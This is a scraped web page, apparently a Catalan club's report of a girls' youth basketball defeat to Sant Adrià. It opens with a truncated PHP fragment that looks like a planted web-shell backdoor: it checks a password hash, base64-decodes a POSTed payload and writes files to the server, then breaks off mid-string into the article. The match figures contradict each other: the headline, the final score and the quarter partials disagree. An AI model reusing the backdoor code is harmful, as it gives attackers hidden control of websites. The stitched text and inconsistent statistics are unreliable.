function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Derrota contra el líder! (91-28) -

Derrota contra el líder! (91-28)

Updated: febrer 15, 2023

Partit molt complicat el que jugava el Preinfantil femení 10A a la pista del líder, el Sant Adrià. En el primer quart el TGN va començar bé, però un parcial de 10-0 en els últims minuts del quart ja van sentenciar el partit. A partir d’allí el TGN va continuar lluitant, però la superioritat del rival en tots els aspectes del joc va ser el detonant del partit.

WINTYM FEMENÍ SANT ADRIÀ 92 – TGN BÀSQUET 10A28

PARCIALS: 89-6, 26-6, 21-5, 26-11

WINTYM FEMENÍ SANT ADRIÀ: Gonzalez (4), Bertolez (-), Van der AA (5), Palacios (16) i Ibañez (12)—cinc inicial—Fernandez (2), Caballero (-), Salvatella (14), Lopez (14), Cabrlles (3), Vicente (13) i Duatis (9).
LES XIFRES DEL PARTIT: 8/12 tirs lliures | 11 faltes

TGN BÀSQUET 10A: Sanchez (-), Ramon (-), Valls (4), Seoane (9) i Porta (8)—cinc inicial—Cabré (-), Dominguez (4), Bueso (-), Salmeron (1) i Parera (2). LES XIFRES DEL PARTIT: 2/10 tirs lliures | 11 faltes